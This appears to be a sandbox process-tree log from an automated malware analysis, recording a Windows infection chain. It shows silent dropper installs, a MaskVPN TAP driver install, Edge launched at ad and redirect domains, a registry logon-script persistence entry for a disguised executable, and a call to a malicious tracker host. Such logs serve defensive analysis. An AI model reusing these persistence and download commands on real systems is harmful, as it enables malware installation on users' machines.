C:\Users\Admin\AppData\Local\Temp\is-7IF7T.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-7IF7T.tmp\3377047_logo_media.exe" /S /UID=burnerch22⤵
-
C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe"C:\Program Files\Uninstall Information\YKIFPSDJBJ\ultramediaburner.exe" /VERYSILENT3⤵
-
C:\Users\Admin\AppData\Local\Temp\8e-bfa8b-397-9c3ac-c931b3104d6ad\SHabinuliju.exe"C:\Users\Admin\AppData\Local\Temp\8e-bfa8b-397-9c3ac-c931b3104d6ad\SHabinuliju.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Checks SCSI registry key(s)
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e8,0x1c0,0x1ec,0x1e4,0x1f0,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1bc,0x1c0,0x1c4,0x198,0x1c8,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747185⤵
-
C:\Users\Admin\AppData\Local\Temp\57-cb145-40c-5baa3-4ec2942061e98\Lalomaepaemo.exe"C:\Users\Admin\AppData\Local\Temp\57-cb145-40c-5baa3-4ec2942061e98\Lalomaepaemo.exe"3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\s30bjnfb.3xo\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 2566⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exeC:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe /qn CAMPAIGN="654"5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ssuexr5l.f1l\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ths4uzi.soc\ufgaa.exe & exit4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exeC:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe"C:\Users\Admin\AppData\Local\Temp\bwv0agf2.4fc\anyname.exe" -q6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\wl4zu4ws.ls5\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2566⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2h1f2naq.eh0\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-O9UJK.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-O9UJK.tmp\VPN.tmp" /SL5="$1036C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe" /silent /subid=7202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\is-6B9A0.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6B9A0.tmp\Setup.tmp" /SL5="$302CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-6GPVG.tmp\Setup.exe" /silent /subid=7203⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵
- Blocklisted process makes network request
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\is-70BV1.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-70BV1.tmp\Inlog.tmp" /SL5="$60176,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HJANM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HJANM.tmp\Setup.tmp" /SL5="$404EC,17352168,721408,C:\Users\Admin\AppData\Local\Temp\is-72KFG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-DAIEP.tmp\{app}\vdi_compiler"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 2605⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=7215⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff9f81746f8,0x7ff9f8174708,0x7ff9f81747186⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:16⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3404 /prefetch:86⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1652 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6084 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:16⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1804,12686848925334358805,2685180942203139615,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:16⤵
-
